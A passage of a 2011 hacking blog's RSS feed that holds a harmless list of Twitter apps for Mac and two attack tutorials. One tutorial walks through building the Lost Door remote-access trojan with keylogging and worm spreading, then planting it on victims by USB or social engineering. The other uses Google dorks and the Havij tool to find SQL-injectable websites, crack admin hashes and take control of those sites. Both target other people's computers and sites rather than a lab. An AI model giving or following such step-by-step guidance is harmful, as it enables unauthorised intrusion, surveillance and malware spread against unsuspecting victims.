<p><em><strong>Wamiq Ali</strong></em> is a tech. lover and a hacker,this is his first post at hungry-hackers. Linux is one of his favourite platforms. He blogs at <em><a title="Hackers Thirst" href="http://www.hackersthirst.com/" target="_blank">www.hackersthirst.com</a></em>.</p>
<div id="_mcePaste" style="position: absolute; left: -10000px; top: 21px; width: 1px; height: 1px; overflow: hidden;">﻿</div>
]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2011/02/how-to-hack-facebook-fan-page.html/feed</wfw:commentRss>
		<slash:comments>46</slash:comments>
		</item>
		<item>
		<title>9 Best Twitter Desktop Apps for Mac</title>
		<link>http://www.hungry-hackers.com/2011/02/9-best-twitter-desktop-apps-for-mac.html</link>
		<comments>http://www.hungry-hackers.com/2011/02/9-best-twitter-desktop-apps-for-mac.html#comments</comments>
		<pubDate>Thu, 17 Feb 2011 16:49:44 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Downloads]]></category>
		<category><![CDATA[Internet News]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Twitter]]></category>
		<category><![CDATA[Apps]]></category>
		<category><![CDATA[Best]]></category>
		<category><![CDATA[desktop]]></category>
		<category><![CDATA[Download]]></category>
		<category><![CDATA[ipad]]></category>
		<category><![CDATA[iPhone]]></category>
		<category><![CDATA[mac]]></category>
		<category><![CDATA[Review]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=1246</guid>
		<description><![CDATA[The popularity of Twitter has increased tremendously in past few years. As a result a lot of Twitter Desktop applications are available to the users for download these days. These applications allow you to receive and post Tweets from your desktop without visiting your Twitter.com page. To reduce your burden of finding the appropriate app for you from such a big pool of apps, we have compiled a list of Best Twitter Desktop apps available in the market. <a href="http://www.hungry-hackers.com/2011/02/9-best-twitter-desktop-apps-for-mac.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Hello Friends,</p>
<p>The popularity of Twitter has increased tremendously in past few years. As a result a lot of Twitter Desktop applications are available to the users for download these days. These applications allow you to receive  and post Tweets from your desktop without visiting your  Twitter.com page. To reduce your burden of finding the appropriate app for you from such a big pool of apps, we have compiled a list of Best Twitter Desktop apps available in the market. Earlier I had compiled a list of <a href="../2010/01/20-best-twitter-desktop-apps-for-windows.html" target="_blank">20 Best Twitter Desktop Apps for Windows</a>. Today I give you 9 Best Twitter Apps for Mac.</p>
<h3>1. EventBox</h3>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/eventbox.png"><img class="size-full wp-image-1884  aligncenter" title="eventbox" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/eventbox.png" alt="" width="569" height="283" /></a></p>
<p style="text-align: justify;">This just-for-Mac app is a favorite of many because it supports Twitter, Facebook, Flickr integration, feed reading with Google Reader and internet trend watching with Reddit and Digg<a rel="http://www.blippr.com/apps/336668-Digg.whtml" href="http://www.blippr.com/apps/336668-Digg" target="_blank"> </a>. Keyboard shortcuts, hotkeys, Instapaper integration, and photo uploads to Flickr and Facebook make <a href="http://thecosmicmachine.com/" target="_blank">EventBox</a> pretty nifty. It’s also got a very slick interface with a navigation menu on the left-hand side.</p>
<h3>2. Mac Lounge</h3>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/Mac-Lounge.png"><img class="size-full wp-image-1885  aligncenter" title="Mac Lounge" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/Mac-Lounge.png" alt="" width="474" height="550" /></a></p>
<p style="text-align: justify;"><a href="http://loungeapp.com/mac/" target="_blank">This app</a> is incredibly appealing for its dead simple, single column interface and respectable feature set. We, of course, love the multiple account support, but also appreciate saved searches, quick access to view followers and following, and tweet options to link to tweet, copy tweet, or copy tweet URL. There’s also an accompanying iPhone app, which syncs with the desktop version and greatly improves the app’s relevance.</p>
<h3>3. Nambu</h3>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/nambu.png"><img class="size-full wp-image-1886  aligncenter" title="nambu" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/nambu.png" alt="" width="210" height="300" /></a></p>
<p style="text-align: justify;">This really sophisticated <a href="http://nambu.com/" target="_blank">Mac app</a> should be more than enough for any and all of your Twitter needs. You’ve got access to your followers and friends, custom groups, search (integrated with FriendFeed<a rel="http://www.blippr.com/apps/336656-FriendFeed.whtml" href="http://www.blippr.com/apps/336656-FriendFeed" target="_blank"> </a> and One Riot), trends, tr.im and pic.im integration, multiple accounts, Ping<a rel="http://www.blippr.com/apps/490170-Ping.whtml" href="http://www.blippr.com/apps/490170-Ping" target="_blank"> </a>.fm integration, filters, and three view options for a one or many column view of tweets.</p>
<h3><strong>4. Sideline:</strong></h3>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/sideline.png"><img class="size-full wp-image-1887    aligncenter" title="sideline" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/sideline.png" alt="" width="550" height="438" /></a></p>
<p style="text-align: justify;"><a href="http://sideline.yahoo.com/" target="_blank">Sideline</a> is just a search and trending topic app from Yahoo, but it does a darn good job at satisfying those specific needs. You can view current Twitter trends, select to see the three latest tweets or pop out as its own saved search, and create custom search groups as tabs.</p>
<p><strong>5. Skimmer:</strong></p>
<p style="text-align: center;"><strong><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/skimmer1.jpg"><img class="size-full wp-image-1890  aligncenter" title="skimmer" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/skimmer1.jpg" alt="" width="550" height="355" /></a><br />
</strong></p>
<p style="text-align: justify;">It’s hard not to love this app. Not only is it beautiful to look at it, but it also tracks your favorite social sites. <a href="http://www.fallon.com/skimmer" target="_blank">Skimmer’s</a> certainly not an application for the social media beginner, but power users of Facebook, Flickr, YouTube, Blogger, and Twitter, will appreciate the aggregation of content, filtering options, view types, and enhanced content viewing experience.</p>
<h3>6. Tweetie</h3>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/tweetie.png"><img class="size-full wp-image-1888  aligncenter" title="tweetie" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/tweetie.png" alt="" width="420" height="230" /></a></p>
<p style="text-align: justify;">A full-featured Twitter client which is available in free ad supported and ad-free versions.  This Desktop app lets you view not only the tweets but also the entire conversation history leading to that tweet. It provides you with an independent compose windows that stay out of your way until you need them. Tweetie for Mac also has search trends to let you find out the hottest trend in Twitter. Other features include threaded DMs, user details, torn off search, bookmarklet, and preferences.</p>
<h3>7. Twibble Desktop</h3>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/Twibble.jpg"><img class="size-full wp-image-1893  aligncenter" title="Twibble" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/Twibble.jpg" alt="" width="260" height="195" /></a></p>
<p style="text-align: justify;"><a href="http://www.twibble.de/twibble-desktop/" target="_blank">Twibble</a> is a bit of a riddle. It’s not a bad app when it comes to feature set, but it’s also not the most intuitive. You can manage multiple accounts, but all tweets are merged together in one stream. You can reply, DM, fav, RT, and copy tweets, but you’ll have to hover over the tweet to even know those behaviors are possible. You can also use keyboard shortcuts, filter your tweets for keywords, or conduct searches that open up in new windows, but Twibble just doesn’t seem to flow as easily as we’d like it to.</p>
<h3>8. Twitterific</h3>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/twitterrific.jpg"><img class="size-full wp-image-1891  aligncenter" title="twitterrific" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/twitterrific.jpg" alt="" width="435" height="346" /></a></p>
<p style="text-align: justify;">Lets you both read and publish posts or “tweets”  using a clean and concise  user interface designed to take up a minimum of real estate on your Mac’s desktop. The app shows a scrolling list of  the latest tweets from your friends, or public feeds. Its features include multiple Twitter account support, auto refreshing, inline display of replies and DMs, shows no. of unread tweets, quickly delete tweets, auto show/hide new tweets, single click access to user pages and more.</p>
<h3 style="text-align: justify;"><strong>9. TwitterPod:</strong></h3>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/Twitter-pod.jpg"><img class="size-full wp-image-1892  aligncenter" title="Twitter pod" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/Twitter-pod.jpg" alt="" width="200" height="200" /></a></p>
<p style="text-align: justify;">This app isn’t known for its sophistication or advanced Twitter functionality. <a href="http://www.apple.com/downloads/macosx/internet_utilities/twitterpod.html" target="_blank">TwitterPod</a> is a basic single column Twitter app with an inline browser and the ability to filter for just tweets with links. Its heyday has long since passed, but original fan boys and girls may still be using this for their twittering.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2011/02/9-best-twitter-desktop-apps-for-mac.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>How to Control a Remote Computer using Lost Door</title>
		<link>http://www.hungry-hackers.com/2011/02/how-to-control-a-remote-computer-using-lost-door.html</link>
		<comments>http://www.hungry-hackers.com/2011/02/how-to-control-a-remote-computer-using-lost-door.html#comments</comments>
		<pubDate>Sun, 13 Feb 2011 11:52:08 +0000</pubDate>
		<dc:creator>Irfan Shakeel</dc:creator>
				<category><![CDATA[Hacking Computer]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Network Hacking]]></category>
		<category><![CDATA[Trojan Horse]]></category>
		<category><![CDATA[Virus Tutorials]]></category>
		<category><![CDATA[Windows Hacking]]></category>
		<category><![CDATA[Computer]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Lost Door]]></category>
		<category><![CDATA[RAT]]></category>
		<category><![CDATA[Remote]]></category>
		<category><![CDATA[tutorial]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=1842</guid>
		<description><![CDATA[Remote Administration tools also known as RAT are programs used by a Hacker to get administrative privileges on the victim's computer. Throughout this article I will teach you how to use Lost Door, a Windows RAT, to control and monitor a victim’s computer remotely. <a href="http://www.hungry-hackers.com/2011/02/how-to-control-a-remote-computer-using-lost-door.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/50273_89076433531_2320266_n.jpg"><img class="alignleft size-full wp-image-1843" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/50273_89076433531_2320266_n.jpg" alt="" width="200" height="240" /></a>Remote Administration tools also known as RAT are windows Trojans or in simple terms programs used by a Hacker to get administrative privileges on the victim&#8217;s computer. Using a RAT you can do a lot of cool things such as &#8220;Upload, delete or modify data&#8221; , &#8220;Edit registry&#8221;, &#8220;Capture victim&#8217;s screen shot&#8221;, &#8220;Take control of victim&#8217;s Computer&#8221;or &#8220;Execute a virus&#8221;  just with a click of a button.</p>
<p><span id="more-1842"></span>Throughout this article I will teach you how to use Lost Door, a Windows RAT, to control and monitor a victim&#8217;s computer remotely.</p>
<p><strong>Disclaimer:</strong> Coder and related sites are not responsible for any abuse done using this software.</p>
<p>Follow the steps below to setup a server for Lost Door.</p>
<ul>
<li>Download Lost Door from <a title="Lost Door" href="http://www.lostdoor.cn/Version/Lost%20door%20V3.2%20Stable%28bulid%202%29.zip" target="_blank">here</a> . (<strong>Update:</strong><em> In case the given download link doesn&#8217;t work, use this secondary download <a title="Lost Door" href="http://www.4shared.com/file/MJis4tS2/Lost_door_V40_Pro.html" target="_blank">link</a>. The password to unzip this file is “ehacking.nethungry-hacker.com” without double quotes.</em>)</li>
<li>On executing the download file, you will see the following screen. Accept it</li>
</ul>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost.jpg"><img class="size-full wp-image-1845    aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost.jpg" alt="" width="534" height="317" /></a></p>
<ul>
<li>After it is open, right click on the window and click on create server</li>
</ul>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost1.jpg"><img class="size-full wp-image-1846  aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost1.jpg" alt="" width="543" height="309" /></a></p>
<ul>
<li>Now enter your IP address and DNS here. Leave the rest of the field as it is.</li>
</ul>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost2.jpg"><img class="size-full wp-image-1847  aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost2.jpg" alt="" width="574" height="328" /></a></p>
<ul>
<li>Now click on the &#8216;Options&#8217;  tab and choose the options as you want. To activate an offline keylogger is a good practice.</li>
</ul>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost3.jpg"><img class="size-full wp-image-1848  aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost3.jpg" alt="" width="393" height="379" /></a></p>
<ul>
<li>Now go to &#8216;Advanced&#8217; Tab. There will options related to spreading. This will be used in case you have more than 1 victim.</li>
</ul>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost4.jpg"><img class="size-full wp-image-1849    aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost4.jpg" alt="" width="445" height="400" /></a></p>
<ul>
<li>Now just go to the &#8216;Create&#8217; tab and click on create server. Your server is ready for use now and now send it to the victim.</li>
</ul>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost5.jpg"><img class="size-full wp-image-1844  aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost5.jpg" alt="" width="427" height="411" /></a></p>
<h3 style="text-align: justify;"><strong>Sending the server file to your victim<br />
</strong></h3>
<p style="text-align: justify;">This is the most important thing after you have created your server file. If you want to take control on a single computer than you have to send this server file to the desired victim but if you want to affect more and more people than you have to use some spreading techniques.</p>
<ul style="text-align: justify;">
<li>If you have physical access to the victim&#8217;s computer then take the server file in a pen drive and just double click on your server file once you have injected the pen drive into that computer.</li>
<li>For those who don&#8217;t have physical access can use social engineering in order to get the victim execute that file on his computer.</li>
</ul>
<h3 style="text-align: justify;"><strong>Using Spreading to affect multiple victims</strong></h3>
<p style="text-align: justify;">If you have more than one victim, then you have an option of using spreading technique. You might think that by creating multiple server files you can control multiple users. But here is a secret about spreading. When you select the spreading option, the server file will act as a worm which will spread itself across different computers via Email or any other channel. So your burden will be only to get one victim to execute that file on his computer, the remaining job of getting other victims will be done on its own.</p>
<p style="text-align: justify;"><strong>About The Author</strong></p>
<p>This post is written by an Irfan Shaeel An Ethical hacker and Penetration tester, Irfan blogs At his blog <a href="http://ehacking.net%20/"><strong>Ehacking.net </strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2011/02/how-to-control-a-remote-computer-using-lost-door.html/feed</wfw:commentRss>
		<slash:comments>34</slash:comments>
		</item>
		<item>
		<title>SQL Injection Using Havij</title>
		<link>http://www.hungry-hackers.com/2011/02/sql-injection-using-havij.html</link>
		<comments>http://www.hungry-hackers.com/2011/02/sql-injection-using-havij.html#comments</comments>
		<pubDate>Thu, 10 Feb 2011 03:42:40 +0000</pubDate>
		<dc:creator>Irfan Shakeel</dc:creator>
				<category><![CDATA[Hacking Forum]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Hardcore Hacking]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Server Hacking]]></category>
		<category><![CDATA[Cracking]]></category>
		<category><![CDATA[google dorks]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Havij]]></category>
		<category><![CDATA[penetration]]></category>
		<category><![CDATA[Server]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[SQL Injection]]></category>
		<category><![CDATA[testing]]></category>
		<category><![CDATA[vulnerablibity]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=1807</guid>
		<description><![CDATA[SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of SQL Server for parsing and execution. Any procedure that constructs SQL statements should be reviewed for injection vulnerabilities because SQL Server will execute all syntactically valid queries that it receives. Even parameterized data can be manipulated by a skilled and determined attacker. <a href="http://www.hungry-hackers.com/2011/02/sql-injection-using-havij.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-1808" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/sql_img.jpg" alt="" width="300" height="225" />SQL injection is an attack in which malicious code is inserted into  strings that are later passed to an instance of SQL Server for parsing  and execution. Any procedure that constructs SQL statements should be  reviewed for injection vulnerabilities because SQL Server will execute  all syntactically valid queries that it receives. Even parameterized  data can be manipulated by a skilled and determined attacker.</p>
<p style="text-align: justify;"><span id="more-1807"></span>SQL Injection can be done by manually injection or via automatic tools. Automatic tools are easy to use and do not require much technical knowledge.</p>
<p style="text-align: justify;">In this tutorial we will discuss Havij. Havij is an automated SQL Injection tool that helps  penetration testers to find and exploit SQL Injection vulnerabilities on  a web page.</p>
<ul style="text-align: justify;">
<li>You can download havij from <a href="http://www.itsecteam.com/en/projects/project1.htm">here</a>.</li>
<li>We will use google dorks to find the vulnerable websites, there is a big list of google dorks  which I will post in my future articles but at this time we will only use the following:</li>
</ul>
<p style="text-align: justify;"><em> </em></p>
<blockquote style="text-align: justify;"><p><em>inurl:index.php?id=</em></p>
<p><em>inurl:trainers.php?id=</em></p>
<p><em>inurl:buy.php?category=</em></p>
<p style="text-align: justify;"><em>inurl:article.php?ID=</em></p>
</blockquote>
<p style="text-align: justify;"><em> </em></p>
<ul style="text-align: justify;">
<li>Just search google using one of the dork and you will see a lot of vulnerable websites.</li>
<li>Open any one of the website than put <em> &#8216;</em> after the link look:</li>
</ul>
<ul style="text-align: justify;">
<li>If you get the following SQL error, that means the website is vulnerable to SQL-injection attack.
<p style="text-align: center;"><img class="aligncenter size-full wp-image-1810" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/21.jpg" alt="" width="515" height="437" /></p>
</li>
<li>Now open Havij and paste the link without &#8216;
<p style="text-align: center;"><img class="size-medium wp-image-1813  aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/1-273x300.jpg" alt="" width="359" height="394" /></p>
<p style="text-align: center;"><img class="size-medium wp-image-1816  aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/myphoto2-274x300.jpg" alt="" width="364" height="399" /></p>
</li>
<li>Now we have to find the columns of the database.
<p style="text-align: center;"><img class="size-medium wp-image-1815  aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/myphoto3-274x300.jpg" alt="" width="366" height="399" /></p>
<p style="text-align: center;"><img class="size-medium wp-image-1819  aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/myphoto4-275x300.jpg" alt="" width="372" height="405" /></p>
</li>
<li>After this you will be able to find the admin id or password but remember normally web server uses MD5 encryption technique, you have to decrypt this password use havij option MD5 or you may read our tutorial on <a title="Cracking MD5" href="http://www.hungry-hackers.com/2008/06/cracking-md5.html" target="_blank">Cracking MD5</a>.</li>
</ul>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/myphoto5.jpg"><img class="size-medium wp-image-1818  aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/myphoto5-274x300.jpg" alt="" width="359" height="392" /></a></p>
<ul style="text-align: justify;">
<li>After decrypting the password, you have to find the admin login page of the website. To do that use Havij options.</li>
<li>Now you may login as the admin user and control the website as you want.</li>
<li>H@ppy H@cking</li>
</ul>
<p><strong>Video Tutorial</strong></p>
<p style="text-align: justify;"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="350" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="play" value="false" /><param name="quality" value="high" /><param name="scale" value="showall" /><param name="src" value="http://www.youtube.com/v/Qvhdz8yE_po" /><embed type="application/x-shockwave-flash" width="425" height="350" src="http://www.youtube.com/v/Qvhdz8yE_po" scale="showall" quality="high" play="false"></embed></object></p>
<p style="text-align: justify;"><strong>About The Author</strong></p>
<p style="text-align: justify;"><strong>Irfan Shakeel </strong>is an  ethical hacker/penetration tester and he have found many bugs on the  famous web server. He is the founder of Ethical <a href="http://www.ehacking.net/" target="_blank">Hacking Blog.</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2011/02/sql-injection-using-havij.html/feed</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
	</channel>
</rss>


<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk: basic
Page Caching using disk: enhanced
Database Caching 6/17 queries in 0.020 seconds using disk: basic

Served from: hungry-hackers.com @ 2012-05-17 21:30:54 -->
